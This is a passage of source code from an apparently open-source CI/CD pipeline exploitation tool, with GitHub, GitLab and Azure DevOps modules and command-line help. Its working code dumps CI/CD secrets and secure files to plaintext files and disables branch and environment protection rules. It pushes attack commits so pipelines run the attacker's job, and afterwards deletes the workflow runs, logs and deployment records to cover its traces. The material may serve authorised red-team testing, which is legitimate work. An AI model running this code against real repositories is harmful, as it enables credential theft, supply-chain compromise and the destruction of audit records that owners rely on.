f"{self._repoURL}/{full_name}", auth=self._auth, headers=self._header, ).json() if response.get("message", None) and response.get("message") == "Bad credentials": raise GitHubBadCredentials(response.get("message")) if response.get("id"): self._repos.append(response.get("full_name")) def listEnvFromrepo(self, repo): logger.debug(f"Listing environment secret from repo: {repo}") res = [] response = self.__paginatedGet(f"{self._repoURL}/{repo}/environments", data="environments") for env in response: res.append(env.get("name")) return res def listSecretsFromEnv(self, repo, env): logger.debug(f"Getting environment secrets for {repo}: {env}") envReq = urllib.parse.quote(env, safe="") res = [] response = self.__paginatedGet(f"{self._repoURL}/{repo}/environments/{envReq}/secrets", data="secrets") for sec in response: res.append(sec.get("name")) return res def listSecretsFromRepo(self, repo): res = [] response = self.__paginatedGet(f"{self._repoURL}/{repo}/actions/secrets", data="secrets") for sec in response: res.append(sec.get("name")) return res def listOrganizationSecretsFromRepo(self, repo): res = [] response = self.__paginatedGet(f"{self._repoURL}/{repo}/actions/organization-secrets", data="secrets") for sec in response: res.append(sec.get("name")) return res def listDependabotSecretsFromRepo(self, repo): res = [] response = self.__paginatedGet(f"{self._repoURL}/{repo}/dependabot/secrets", data="secrets") for sec in response: res.append(sec.get("name")) return res def listDependabotOrganizationSecrets(self): res = [] response = self.__paginatedGet(f"https://api.github.com/orgs/{self._org}/dependabot/secrets", data="secrets") for sec in response: res.append(sec.get("name")) return res def listEnvProtections(self, repo, env): logger.debug("Getting environment protections") envReq = urllib.parse.quote(env, safe="") res = [] response = self._session.get( f"{self._repoURL}/{repo}/environments/{envReq}", auth=self._auth, headers=self._header, ).json() for protection in response.get("protection_rules"): protectionType = protection.get("type") res.append(protectionType) return res def getEnvDetails(self, repo, env): envReq = urllib.parse.quote(env, safe="") response = self._session.get( f"{self._repoURL}/{repo}/environments/{envReq}", auth=self._auth, headers=self._header, ).json() if response.get("message"): raise GitHubError(response.get("message")) return response def createDeploymentBranchPolicy(self, repo, env): envReq = urllib.parse.quote(env, safe="") logger.debug(f"Adding new branch policy for {self._branchName} on {envReq}") data = {"name": f"{self._branchName}"} response = self._session.post( f"{self._repoURL}/{repo}/environments/{envReq}/deployment-branch-policies", json=data, auth=self._auth, headers=self._header, ).json() if response.get("message"): raise GitHubError(response.get("message")) policyId = response.get("id") logger.debug(f"Branch policy id: {policyId}") return policyId def deleteDeploymentBranchPolicy(self, repo, env): logger.debug("Delete deployment branch policy") envReq = urllib.parse.quote(env, safe="") response = self._session.get( f"{self._repoURL}/{repo}/environments/{envReq}", auth=self._auth, headers=self._header, ).json() if response.get("deployment_branch_policy") is not None: response = self._session.get( f"{self._repoURL}/{repo}/environments/{envReq}/deployment-branch-policies", auth=self._auth, headers=self._header, ).json() for policy in response.get("branch_policies"): if policy.get("name").lower() == self._branchName.lower(): logger.verbose(f"Deleting branch policy for {self._branchName} on {envReq}") policyId = policy.get("id") self._session.delete( f"{self._repoURL}/{repo}/environments/{envReq}/deployment-branch-policies/{policyId}", auth=self._auth, headers=self._header, ) def disableBranchProtectionRules(self, repo): logger.debug("Modifying branch protection") response = self._session.get( f"{self._repoURL}/{repo}/branches/{urllib.parse.quote(self._branchName)}", auth=self._auth, headers=self._header, ).json() if response.get("name") and response.get("protected"): data = { "required_status_checks": None, "enforce_admins": False, "required_pull_request_reviews": None, "restrictions": None, "allow_deletions": True, "allow_force_pushes": True, } self._session.put( f"{self._repoURL}/{repo}/branches/{urllib.parse.quote(self._branchName)}/protection", json=data, auth=self._auth, headers=self._header, ) def modifyEnvProtectionRules(self, repo, env, wait, reviewers, branchPolicy): data = { "wait_timer": wait, "reviewers": reviewers, "deployment_branch_policy": branchPolicy, } envReq = urllib.parse.quote(env, safe="") response = self._session.put( f"{self._repoURL}/{repo}/environments/{envReq}", json=data, auth=self._auth, headers=self._header, ).json() if response.get("message"): raise GitHubError(response.get("message")) return response def deleteDeploymentBranchPolicyForAllEnv(self, repo): allEnv = self.listEnvFromrepo(repo) for env in allEnv: self.deleteDeploymentBranchPolicy(repo, env) def checkBranchProtectionRules(self, repo): response = self._session.get( f"{self._repoURL}/{repo}/branches/{urllib.parse.quote(self._branchName)}", auth=self._auth, headers=self._header, ).json() if response.get("message"): raise GitHubError(response.get("message")) return response.get("protected") def getBranchesProtectionRules(self, repo): logger.debug("Getting branch protection rules") response = self._session.get( f"{self._repoURL}/{repo}/branches/{urllib.parse.quote(self._branchName)}/protection", auth=self._auth, headers=self._header, ).json() if response.get("message"): return None return response def updateBranchesProtectionRules(self, repo, protections): logger.debug("Updating branch protection rules") response = self._session.put( f"{self._repoURL}/{repo}/branches/{urllib.parse.quote(self._branchName)}/protection", auth=self._auth, headers=self._header, json=protections, ).json() return response def cleanDeploymentsLogs(self, repo): logger.verbose(f"Cleaning deployment logs from: {repo}") url = f"{self._repoURL}/{repo}/deployments?ref={urllib.parse.quote(self._branchName)}" response = self.__paginatedGet(url, maxData=200) for deployment in response: if not self._isGHSToken and deployment.get("creator").get("login").lower() != self._githubLogin.lower(): continue commit = self._session.get( f"{self._repoURL}/{repo}/commits/{deployment['sha']}", auth=self._auth, headers=self._header ).json() # We want to delete only our action so we must filter some attributes if commit["commit"]["message"] not in [Git.ATTACK_COMMIT_MSG, Git.CLEAN_COMMIT_MSG]: continue if commit["commit"]["committer"]["name"] != Git.USER: continue if commit["commit"]["committer"]["email"] != Git.EMAIL: continue deploymentId = deployment.get("id") data = {"state": "inactive"} self._session.post( f"{self._repoURL}/{repo}/deployments/{deploymentId}/statuses", json=data, auth=self._auth, headers=self._header, ) self._session.delete( f"{self._repoURL}/{repo}/deployments/{deploymentId}", auth=self._auth, headers=self._header, ) def cleanRunLogs(self, repo, workflowFilename): logger.verbose(f"Cleaning run logs from: {repo}") url = f"{self._repoURL}/{repo}/actions/runs?branch={urllib.parse.quote(self._branchName)}" if not self._isGHSToken: url += f"&actor={self._githubLogin.lower()}" # we dont scan for all the logs we only check the last 200 response = self.__paginatedGet(url, data="workflow_runs", maxData=200) for run in response: # skip if it's not our commit if run.get("head_commit").get("message") not in [Git.ATTACK_COMMIT_MSG, Git.CLEAN_COMMIT_MSG]: continue committer = run.get("head_commit").get("committer") if committer.get("name") != Git.USER: continue if committer.get("email") != Git.EMAIL: continue runId = run.get("id") status = ( self._session.get( f"{self._repoURL}/{repo}/actions/runs/{runId}", json={}, auth=self._auth, headers=self._header, ) .json() .get("status") ) if status != "completed": self._session.post( f"{self._repoURL}/{repo}/actions/runs/{runId}/cancel", json={}, auth=self._auth, headers=self._header, ) status = ( self._session.get( f"{self._repoURL}/{repo}/actions/runs/{runId}", json={}, auth=self._auth, headers=self._header, ) .json() .get("status") ) if status != "completed": for i in range(self._maxRetry): time.sleep(2) status = ( self._session.get( f"{self._repoURL}/{repo}/actions/runs/{runId}", json={}, auth=self._auth, headers=self._header, ) .json() .get("status") ) if status == "completed": break self._session.delete( f"{self._repoURL}/{repo}/actions/runs/{runId}/logs", auth=self._auth, headers=self._header, ) self._session.delete( f"{self._repoURL}/{repo}/actions/runs/{runId}", auth=self._auth, headers=self._header, ) def cleanAllLogs(self, repo, workflowFilename): logger.debug(f"Cleaning logs for: {repo}") self.cleanRunLogs(repo, workflowFilename) self.cleanDeploymentsLogs(repo) def createWorkflowOutputDir(self, repo): outputName = repo.split("/") makedirs(f"{self._outputDir}/{outputName[0]}/{outputName[1]}", exist_ok=True) def waitWorkflow(self, repo, workflowFilename): logger.info("Getting workflow output") time.sleep(5) workflowFilename = urllib.parse.quote_plus(workflowFilename) response = self._session.get( f"{self._repoURL}/{repo}/actions/workflows/{workflowFilename}/runs?branch={urllib.parse.quote(self._branchName)}", auth=self._auth, headers=self._header, ).json() if response.get("total_count", 0) == 0: for i in range(self._maxRetry): logger.warning(f"Workflow not started, sleeping for {self._sleepTime}s") time.sleep(self._sleepTime) response = self._session.get( f"{self._repoURL}/{repo}/actions/workflows/{workflowFilename}/runs?branch={urllib.parse.quote(self._branchName)}", auth=self._auth, headers=self._header, ).json() if response.get("total_count", 0) != 0: break if i == (self._maxRetry - 1): logger.error("Error: workflow still not started.") return None, None if response.get("workflow_runs")[0].get("status") != "completed": for i in range(self._maxRetry): logger.warning(f"Workflow not finished, sleeping for {self._sleepTime}s") time.sleep(self._sleepTime) response = self._session.get( f"{self._repoURL}/{repo}/actions/workflows/{workflowFilename}/runs?branch={urllib.parse.quote(self._branchName)}", auth=self._auth, headers=self._header, ).json() if response.get("workflow_runs")[0].get("status") == "completed": break if i == (self._maxRetry - 1): logger.error("Error: workflow still not finished.") return ( response.get("workflow_runs")[0].get("id"), response.get("workflow_runs")[0].get("conclusion"), ) def downloadWorkflowOutput(self, repo, name, workflowId): self.createWorkflowOutputDir(repo) zipFile = self._session.get( f"{self._repoURL}/{repo}/actions/runs/{workflowId}/logs", auth=self._auth, headers=self._header, ) date = time.strftime("%Y-%m-%d_%H-%M-%S") with open(f"{self._outputDir}/{repo}/workflow_{name}_{date}.zip", "wb") as f: f.write(zipFile.content) f.close() return f"workflow_{name}_{date}.zip" def getFailureReason(self, repo, workflowId): res = [] workflow = self._session.get( f"{self._repoURL}/{repo}/actions/runs/{workflowId}", auth=self._auth, headers=self._header, ).json() checkSuiteId = workflow.get("check_suite_id") checkRuns = self._session.get( f"{self._repoURL}/{repo}/check-suites/{checkSuiteId}/check-runs", auth=self._auth, headers=self._header, ).json() if checkRuns.get("total_count"): for checkRun in checkRuns.get("check_runs"): checkRunId = checkRun.get("id") annotations = self._session.get( f"{self._repoURL}/{repo}/check-runs/{checkRunId}/annotations", auth=self._auth, headers=self._header, ).json() for annotation in annotations: res.append(annotation.get("message")) return res def filterWriteRepos(self): res = [] for repo in self._repos: try: self.listSecretsFromRepo(repo) res.append(repo) except GitHubError: pass self._repos = res def isGHSToken(self): return self._isGHSToken ================================================ FILE: nordstream/cicd/gitlab.py ================================================ import requests import time import re import sys from os import makedirs from nordstream.utils.log import logger from nordstream.utils.errors import GitLabError from nordstream.git import Git from nordstream.utils.constants import * from nordstream.utils.helpers import isGitLabSessionCookie # painful warnings you know what you are doing right ? requests.packages.urllib3.disable_warnings() class GitLab: _DEFAULT_BRANCH_NAME = DEFAULT_BRANCH_NAME _auth = None _session = None _token = None _projects = [] _groups = [] _outputDir = OUTPUT_DIR _headers = { "User-Agent": USER_AGENT, } _cookies = {} _gitlabURL = None _branchName = _DEFAULT_BRANCH_NAME _sleepTime = 15 _maxRetry = 10 def __init__(self, url, token, verifCert): self._gitlabURL = url.strip("/") self._token = token self._session = requests.Session() self._session.verify = verifCert self.setCookiesAndHeaders() self._gitlabLogin = self.__getLogin() @property def projects(self): return self._projects @property def groups(self): return self._groups @property def token(self): return self._token @property def url(self): return self._gitlabURL @property def outputDir(self): return self._outputDir @outputDir.setter def outputDir(self, value): self._outputDir = value @property def defaultBranchName(self): return self._DEFAULT_BRANCH_NAME @property def branchName(self): return self._branchName @branchName.setter def branchName(self, value): self._branchName = value @classmethod def checkToken(cls, token, gitlabURL, verifyCert): logger.verbose(f"Checking token: {token}") # from https://docs.gitlab.com/ee/api/rest/index.html#personalprojectgroup-access-tokens try: cookies = {} headers = GitLab._headers if isGitLabSessionCookie(token): cookies["_gitlab_session"] = token else: headers["PRIVATE-TOKEN"] = token return ( requests.get( f"{gitlabURL.strip('/')}/api/v4/user", headers=headers, cookies=cookies, verify=verifyCert, ).status_code == 200 ) except requests.exceptions.RequestException as e: logger.error(e) sys.exit(1) return False def __getLogin(self): response = self.getUser() return response.get("username", "") def getUser(self): logger.debug(f"Retrieving user information") return self._session.get(f"{self._gitlabURL}/api/v4/user").json() def setCookiesAndHeaders(self): if isGitLabSessionCookie(self._token): self._session.cookies.update({"_gitlab_session": self._token}) else: self._session.headers.update({"PRIVATE-TOKEN": self._token}) self._session.headers.update(self._headers) def __paginatedGet(self, url, params={}): params["per_page"] = 100 res = [] i = 1 while True: params["page"] = i logger.debug(f"Paginated GET request to {url} with parameters {params}") response = self._session.get(url, params=params) if response.status_code == 200: if len(response.json()) == 0: break res.extend(response.json()) i += 1 else: logger.debug(f"Error {response.status_code} while retrieving data: {url}") return response.status_code, response.json() return response.status_code, res def listRunnersFromProject(self, project): id = project.get("id") res = [] status_code, response = self.__paginatedGet(f"{self._gitlabURL}/api/v4/projects/{id}/jobs") if status_code == 200 and len(response) > 0: for job in response: if not job.get("runner") or not job.get("runner_manager"): continue # Get executor from job trace executor = "unknown" response = self._session.get(f"{self._gitlabURL}/api/v4/projects/{id}/jobs/{job['id']}/trace") if response.status_code == 200 and len(response.text) > 0: regex = r'Preparing the "([^"]+)" executor' match = re.search(r'Preparing the "([^"]+)" executor', response.text) if match: executor = match.group(1) _runner = job["runner"] _manager = job["runner_manager"] res.append( { "id": f"{_runner['id']}/{_manager['system_id']}", "status": _manager["status"], "contacted_at": _manager["contacted_at"], "runner_type": _runner["runner_type"], "access_level": "unknown", "executor": executor, "description": _runner["description"], "platform": _manager["platform"], "architecture": _manager["architecture"], "ip_address": _manager["ip_address"], "version": _manager["version"], "projects": [project["path_with_namespace"]], "tags": job["tag_list"], } ) elif status_code == 403: raise GitLabError(response.get("message")) return res def listVariablesFromProject(self, project): id = project.get("id") res = [] status_code, response = self.__paginatedGet(f"{self._gitlabURL}/api/v4/projects/{id}/variables") if status_code == 200 and len(response) > 0: path = self.__createOutputDir(project.get("path_with_namespace")) f = open(f"{path}/secrets.txt", "w") for variable in response: secret = {"key": variable["key"], "value": variable["value"], "protected": variable["protected"]} if variable.get("hidden") is not None: secret["hidden"] = variable["hidden"] else: secret["hidden"] = "N/A" res.append(secret) f.write(f"{variable['key']}={variable['value']}\n") f.close() elif status_code == 403: raise GitLabError(response.get("message")) return res def listInheritedVariablesFromProject(self, project): id = project.get("id") res = [] graphQL = { "operationName": "getInheritedCiVariables", "variables": {"first": 100, "fullPath": project.get("path_with_namespace")}, "query": """ query getInheritedCiVariables($after: String, $first: Int, $fullPath: ID!) { project(fullPath: $fullPath) { inheritedCiVariables(after: $after, first: $first) { nodes { key groupName masked hidden protected raw } } } } """, } response = self._session.post(f"{self._gitlabURL}/api/graphql", json=graphQL) if response.status_code == 200 and len(response.text) > 0: if response.json().get("data", {}).get("project", {}) is None: return res path = self.__createOutputDir(project.get("path_with_namespace")) f = open(f"{path}/secrets.txt", "a") nodes = response.json().get("data", {}).get("project", {}).get("inheritedCiVariables", {}).get("nodes", []) for variable in nodes: secret = { "key": variable["key"], "value": variable["raw"], "group": variable["groupName"], "protected": variable["protected"], } if variable.get("hidden") is not None: secret["hidden"] = variable["hidden"] else: secret["hidden"] = "N/A" res.append(secret) f.write(f"{variable['key']}={variable['raw']}\n") f.close() elif response.status_code == 403: raise GitLabError(response.get("message")) return res def listSecureFilesFromProject(self, project): logger.debug("Getting project secure files") id = project.get("id") res = [] status_code, response = self.__paginatedGet(f"{self._gitlabURL}/api/v4/projects/{id}/secure_files") if status_code == 200 and len(response) > 0: path = self.__createOutputDir(project.get("path_with_namespace")) date = time.strftime("%Y-%m-%d_%H-%M-%S") for secFile in response: date = time.strftime("%Y-%m-%d_%H-%M-%S") name = "".join( [c for c in secFile.get("name") if c.isalpha() or c.isdigit() or c in (" ", ".", "-", "_")] ).strip() fileName = f"securefile_{date}_{name}" f = open(f"{path}/{fileName}", "wb") content = self._session.get( f"{self._gitlabURL}/api/v4/projects/{id}/secure_files/{secFile.get('id')}/download" ) # handle large files for chunk in content.iter_content(chunk_size=8192): f.write(chunk) f.close() res.append({"name": secFile.get("name"), "path": f"{path}/{fileName}"}) elif status_code == 403: raise GitLabError(response.get("message")) return res def listVariablesFromGroup(self, group): id = group.get("id") res = [] status_code, response = self.__paginatedGet(f"{self._gitlabURL}/api/v4/groups/{id}/variables") if status_code == 200 and len(response) > 0: path = self.__createOutputDir(group.get("full_path")) f = open(f"{path}/secrets.txt", "w") for variable in response: secret = {"key": variable["key"], "value": variable["value"], "protected": variable["protected"]} if variable.get("hidden") is not None: secret["hidden"] = variable["hidden"] else: secret["hidden"] = "N/A" res.append(secret) f.write(f"{variable['key']}={variable['value']}\n") f.close() elif status_code == 403: raise GitLabError(response.get("message")) return res def listVariablesFromInstance(self): res = [] status_code, response = self.__paginatedGet(f"{self._gitlabURL}/api/v4/admin/ci/variables") if status_code == 200 and len(response) > 0: path = self.__createOutputDir("") f = open(f"{path}/secrets.txt", "w") for variable in response: secret = {"key": variable["key"], "value": variable["value"], "protected": variable["protected"]} if variable.get("hidden") is not None: secret["hidden"] = variable["hidden"] else: secret["hidden"] = "N/A" res.append(secret) f.write(f"{variable['key']}={variable['value']}\n") f.close() elif status_code == 403: raise GitLabError(response.get("message")) return res def addProjects(self, project=None, filterWrite=False, strict=False, membership=False): params = {} if membership: params["membership"] = True if project != None: params["search_namespaces"] = True params["search"] = project if filterWrite: params["min_access_level"] = 30 if not (project and project.isnumeric()): status_code, response = self.__paginatedGet(f"{self._gitlabURL}/api/v4/projects", params) else: response = self._session.get(f"{self._gitlabURL}/api/v4/projects/{project}") status_code = response.status_code response = [response.json()] if status_code == 200: if len(response) == 0: return for p in response: if strict and p.get("path_with_namespace") != project: continue p = { "id": p.get("id"), "path_with_namespace": p.get("path_with_namespace"), "name": p.get("name"), "path": p.get("path"), } self._projects.append(p) else: logger.error(f"Error while retrieving {f'project: {project}' if project is not None else 'projects'}") logger.debug(response) def addGroups(self, group=None): params = {"all_available": True} if group != None: params["search_namespaces"] = True params["search"] = group status_code, response = self.__paginatedGet(f"{self._gitlabURL}/api/v4/groups", params) if status_code == 200: if len(response) == 0: return for p in response: p = { "id": p.get("id"), "full_path": p.get("full_path"), "name": p.get("name"), } self._groups.append(p) else: logger.error("Error while retrieving groups") logger.debug(response) def listUsers(self): logger.debug(f"Listing users.") res = [] status_code, response = self.__paginatedGet(f"{self._gitlabURL}/api/v4/users") if status_code == 200: if len(response) == 0: return for p in response: u = { "id": p.get("id"), "username": p.get("username"), "email": p.get("email"), "is_admin": p.get("is_admin"), } res.append(u) else: logger.error("Error while retrieving users") logger.debug(response) return res def __createOutputDir(self, name): # outputName = name.replace("/", "_") path = f"{self._outputDir}/{name}" makedirs(path, exist_ok=True) return path def waitPipeline(self, projectId): logger.info("Getting pipeline output") time.sleep(5) response = self._session.get( f"{self._gitlabURL}/api/v4/projects/{projectId}/pipelines?ref={self._branchName}&username={self._gitlabLogin}" ).json() if response[0].get("status") not in COMPLETED_STATES: for i in range(self._maxRetry): logger.warning(f"Pipeline still running, sleeping for {self._sleepTime}s") time.sleep(self._sleepTime) response = self._session.get( f"{self._gitlabURL}/api/v4/projects/{projectId}/pipelines?ref={self._branchName}&username={self._gitlabLogin}" ).json() if response[0].get("status") in COMPLETED_STATES: break if i == (self._maxRetry - 1): logger.error("Error: pipeline still not finished.") return ( response[0].get("id"), response[0].get("status"), ) def __getJobs(self, projectId, pipelineId): status_code, response = self.__paginatedGet( f"{self._gitlabURL}/api/v4/projects/{projectId}/pipelines/{pipelineId}/jobs" ) if status_code == 403: raise GitLabError(response.get("message")) # reverse the list to get the first job at the first position return response[::-1] def downloadPipelineOutput(self, project, pipelineId): projectPath = project.get("path_with_namespace") self.__createOutputDir(projectPath) projectId = project.get("id") jobs = self.__getJobs(projectId, pipelineId) date = time.strftime("%Y-%m-%d_%H-%M-%S") f = open(f"{self._outputDir}/{projectPath}/pipeline_{date}.log", "w") if len(jobs) == 0: return None for job in jobs: jobId = job.get("id") jobName = job.get("name", "") jobStage = job.get("stage", "") jobStatus = job.get("status", "") output = self.__getTraceForJobId(projectId, jobId) if jobStatus != "skipped": f.write(f"[+] {jobName} (stage={jobStage})\n") f.write(output) f.close() return f"pipeline_{date}.log" def __getTraceForJobId(self, projectId, jobId): response = self._session.get(f"{self._gitlabURL}/api/v4/projects/{projectId}/jobs/{jobId}/trace") if response.status_code != 200: for i in range(self._maxRetry): logger.warning(f"Output not ready, sleeping for {self._sleepTime}s") time.sleep(self._sleepTime) response = self._session.get(f"{self._gitlabURL}/api/v4/projects/{projectId}/jobs/{jobId}/trace") if response.status_code == 200: break if i == (self._maxRetry - 1): logger.error("Output still no ready, error !") return None return response.text def __deletePipeline(self, projectId): logger.debug("Deleting pipeline") status_code, response = self.__paginatedGet( f"{self._gitlabURL}/api/v4/projects/{projectId}/pipelines?ref={self._branchName}&username={self._gitlabLogin}" ) headers = {} # Get CSRF token when using session cookie otherwise we can't delete a pipeline if isGitLabSessionCookie(self._token): html_content = self._session.get(f"{self._gitlabURL}/").text pattern = r' --org [extraction] [--project --write-filter --no-clean --branch-name --pipeline-name --pipeline-file --repo-name --pool-name --os --default-agent --sleep ] nord-stream devops [options] --token --org --yaml --project [--write-filter --no-clean --branch-name --pipeline-name --pipeline-file --repo-name --sleep ] nord-stream devops [options] --token --org --build-yaml [--build-type ] [--pool-name ] [--os linux|windows] nord-stream devops [options] --token --org --clean-logs [--project ] nord-stream devops [options] --token --org --list-projects [--write-filter] nord-stream devops [options] --token --org --list-repositories [--project ] nord-stream devops [options] --token --org (--list-secrets [--project --write-filter] | --list-users) nord-stream devops [options] --token --org --describe-token nord-stream devops [options] --token --list-orgs Options: -h --help Show this screen. --version Show version. -v, --verbose Verbose mode -d, --debug Debug mode --output-dir Output directory for logs --ignore-cert Allow insecure server connections Commit: --user User used to commit --email Email address used commit --key-id GPG primary key ID to sign commits args: --token Azure DevOps personal token or JWT --org Org name -p, --project Run on selected project (can be a file) -y, --yaml Run arbitrary job --clean-logs Delete all pipeline created by this tool. This operation is done by default but can be manually triggered. --no-clean Don't clean pipeline logs (default false) --list-projects List all projects. --list-repositories List all repositories. --list-secrets List all secrets. --list-users List all users. --write-filter Filter projects where current user has write or admin access. --build-yaml Create a pipeline yaml file with default configuration. --build-type Type used to generate the yaml file can be: default, azurerm, github, aws, sonar, ssh --describe-token Display information on the token --branch-name Use specific branch name for deployment. --pipeline-name Use pipeline for deployment. --pipeline-file Pipeline filename (default: azure-pipelines.yml). --repo-name Use specific repo for deployment. --pool-name Use specific pool name for deployment. This value will be set as pool name in the YAML file --default-agent Use specific default agent pool for deployment. This value will be used as Default agent pool for the pipeline --os [linux | windows] The agent's OS where the pipeline will be run. Default to linux --sleep Sleep this amount of time before retrieving pipeline result (15s by default) Exctraction: --extract Extract following secrets [vg,sf,gh,az,aws,sonar,ssh] --no-extract Don't extract following secrets [vg,sf,gh,az,aws,sonar,ssh] Examples: List all secrets from all projects $ nord-stream devops --token "$PAT" --org myorg --list-secrets Dump all secrets from all projects $ nord-stream devops --token "$PAT" --org myorg Authors: @hugow @0hexit """ from docopt import docopt from nordstream.cicd.devops import DevOps from nordstream.core.devops.devops import DevOpsRunner from nordstream.git import Git from nordstream.utils.log import NordStreamLog, logger from nordstream.utils.devops import listOrgs def start(argv): args = docopt(__doc__, argv=argv) if args["--verbose"]: NordStreamLog.setVerbosity(verbose=1) if args["--debug"]: NordStreamLog.setVerbosity(verbose=2) logger.debug(args) if args["--list-orgs"]: listOrgs(args["--token"]) return # check validity of the token if not DevOps.checkToken(args["--token"], args["--org"], (not args["--ignore-cert"])): logger.critical("Invalid token or org.") # devops setup devops = DevOps(args["--token"], args["--org"], (not args["--ignore-cert"])) if args["--output-dir"]: devops.outputDir = args["--output-dir"] + "/" if args["--branch-name"]: devops.branchName = args["--branch-name"] if args["--pipeline-name"]: devops.pipelineName = args["--pipeline-name"] if args["--repo-name"]: devops.repoName = args["--repo-name"] if args["--default-agent"]: devops.defaultAgentPool = args["--default-agent"] if args["--sleep"]: devops.sleepTime = args["--sleep"] devopsRunner = DevOpsRunner(devops) if args["--key-id"]: Git.KEY_ID = args["--key-id"] if args["--user"]: Git.USER = args["--user"] if args["--email"]: Git.EMAIL = args["--email"] if args["--pipeline-file"]: devopsRunner.pipelineFilename = args["--pipeline-file"] if args["--yaml"]: devopsRunner.yaml = args["--yaml"] if args["--write-filter"]: devopsRunner.writeAccessFilter = args["--write-filter"] if args["--pool-name"]: devopsRunner.poolName = args["--pool-name"] if args["--os"]: devopsRunner.os = args["--os"].lower() if args["--extract"] and args["--no-extract"]: logger.critical("Can't use both --service-connection and --no-service-connection option.") if args["--extract"]: devopsRunner.parseExtractList(args["--extract"]) if args["--no-extract"]: devopsRunner.parseExtractList(args["--no-extract"], False) if args["--no-clean"]: devopsRunner.cleanLogs = not args["--no-clean"] if args["--describe-token"]: devopsRunner.describeToken() return devopsRunner.getProjects(args["--project"]) # logic if args["--list-projects"]: devopsRunner.listDevOpsProjects() elif args["--list-repositories"]: devopsRunner.listDevOpsRepositories() elif args["--list-users"]: devopsRunner.listDevOpsUsers() elif args["--list-secrets"]: devopsRunner.listProjectSecrets() elif args["--clean-logs"]: devopsRunner.manualCleanLogs() elif args["--build-yaml"]: devopsRunner.output = args["--build-yaml"] devopsRunner.createYaml(args["--build-type"]) else: devopsRunner.runPipeline() ================================================ FILE: nordstream/commands/github.py ================================================ """ CICD pipeline exploitation tool Usage: nord-stream github [options] --token --org [--repo --no-repo --no-env --no-org --env --disable-protections --branch-name --no-clean] nord-stream github [options] --token --org --yaml --repo [--env --disable-protections --branch-name --no-clean] nord-stream github [options] --token --org ([--clean-logs] [--clean-branch-policy]) [--repo --branch-name ] nord-stream github [options] --token --org --build-yaml --repo [--build-type --env ] nord-stream github [options] --token --org --azure-tenant-id --azure-client-id [--repo --env --disable-protections --branch-name --no-clean] nord-stream github [options] --token --org --aws-role --aws-region [--repo --env --disable-protections --branch-name --no-clean] nord-stream github [options] --token --org --list-protections [--repo --branch-name --disable-protections] nord-stream github [options] --token --org --list-secrets [--repo --no-repo --no-env --no-org] nord-stream github [options] --token [--org ] --list-repos [--write-filter] nord-stream github [options] --token --describe-token Options: -h --help Show this screen. --version Show version. -v, --verbose Verbose mode -d, --debug Debug mode --output-dir Output directory for logs Commit: --user User used to commit --email Email address used commit --key-id GPG primary key ID to sign commits args: --token Github personal token --org Org name -r, --repo Run on selected repo (can be a file) -y, --yaml Run arbitrary job --clean-logs Delete all logs created by this tool. This operation is done by default but can be manually triggered. --no-clean Don't clean workflow logs (default false) --clean-branch-policy Remove branch policy, can be used with --repo. This operation is done by default but can be manually triggered. --build-yaml Create a pipeline yaml file with all secrets. --build-type Type used to generate the yaml file can be: default, azureoidc, awsoidc --env Specify env for the yaml file creation. --no-repo Don't extract repo secrets. --no-env Don't extract environnments secrets. --no-org Don't extract organization secrets. --azure-tenant-id Identifier of the Azure tenant associated with the application having federated credentials (OIDC related). --azure-subscription-id Identifier of the Azure subscription associated with the application having federated credentials (OIDC related). --azure-client-id Identifier of the Azure application (client) associated with the application having federated credentials (OIDC related). --aws-role AWS role to assume (OIDC related). --aws-region AWS region (OIDC related). --list-protections List all protections. --list-repos List all repos. --list-secrets List all secrets. --disable-protections Disable the branch protection rules (needs admin rights) --write-filter Filter repo where current user has write or admin access. --force Don't check environment and branch protections. --branch-name Use specific branch name for deployment. --describe-token Display information on the token Examples: List all secrets from all repositories $ nord-stream github --token "$GHP" --org myorg --list-secrets Dump all secrets from all repositories and try to disable branch protections $ nord-stream github --token "$GHP" --org myorg --disable-protections Authors: @hugow @0hexit """ from docopt import docopt from nordstream.cicd.github import GitHub from nordstream.core.github.github import GitHubWorkflowRunner from nordstream.utils.log import logger, NordStreamLog from nordstream.git import Git def start(argv): args = docopt(__doc__, argv=argv) if args["--verbose"]: NordStreamLog.setVerbosity(verbose=1) if args["--debug"]: NordStreamLog.setVerbosity(verbose=2) logger.debug(args) # check validity of the token if not GitHub.checkToken(args["--token"]): logger.critical("Invalid token.") # github setup gitHub = GitHub(args["--token"]) if args["--output-dir"]: gitHub.outputDir = args["--output-dir"] + "/" if args["--org"]: gitHub.org = args["--org"] if args["--branch-name"]: gitHub.branchName = args["--branch-name"] logger.info(f'Using branch: "{gitHub.branchName}"') if args["--key-id"]: Git.KEY_ID = args["--key-id"] if args["--user"]: Git.USER = args["--user"] if args["--email"]: Git.EMAIL = args["--email"] # runner setup gitHubWorkflowRunner = GitHubWorkflowRunner(gitHub, args["--env"]) if args["--no-repo"]: gitHubWorkflowRunner.extractRepo = not args["--no-repo"] if args["--no-env"]: gitHubWorkflowRunner.extractEnv = not args["--no-env"] if args["--no-org"]: gitHubWorkflowRunner.extractOrg = not args["--no-org"] if args["--yaml"]: gitHubWorkflowRunner.yaml = args["--yaml"] if args["--disable-protections"]: gitHubWorkflowRunner.disableProtections = args["--disable-protections"] if args["--write-filter"]: gitHubWorkflowRunner.writeAccessFilter = args["--write-filter"] if args["--force"]: gitHubWorkflowRunner.forceDeploy = args["--force"] if args["--aws-role"] or args["--azure-tenant-id"]: gitHubWorkflowRunner.exploitOIDC = True if args["--azure-tenant-id"]: gitHubWorkflowRunner.tenantId = args["--azure-tenant-id"] if args["--azure-subscription-id"]: gitHubWorkflowRunner.subscriptionId = args["--azure-subscription-id"] if args["--azure-client-id"]: gitHubWorkflowRunner.clientId = args["--azure-client-id"] if args["--aws-role"]: gitHubWorkflowRunner.role = args["--aws-role"] if args["--aws-region"]: gitHubWorkflowRunner.region = args["--aws-region"] if args["--no-clean"]: gitHubWorkflowRunner.cleanLogs = not args["--no-clean"] # logic if args["--describe-token"]: gitHubWorkflowRunner.describeToken() elif args["--list-repos"]: gitHubWorkflowRunner.getRepos(args["--repo"]) gitHubWorkflowRunner.listGitHubRepos() elif args["--list-secrets"]: gitHubWorkflowRunner.getRepos(args["--repo"]) gitHubWorkflowRunner.listGitHubSecrets() elif args["--build-yaml"]: gitHubWorkflowRunner.writeAccessFilter = True gitHubWorkflowRunner.workflowFilename = args["--build-yaml"] gitHubWorkflowRunner.createYaml(args["--repo"], args["--build-type"]) # Cleaning elif args["--clean-logs"] or args["--clean-branch-policy"]: gitHubWorkflowRunner.getRepos(args["--repo"]) if args["--clean-logs"]: gitHubWorkflowRunner.manualCleanLogs() if 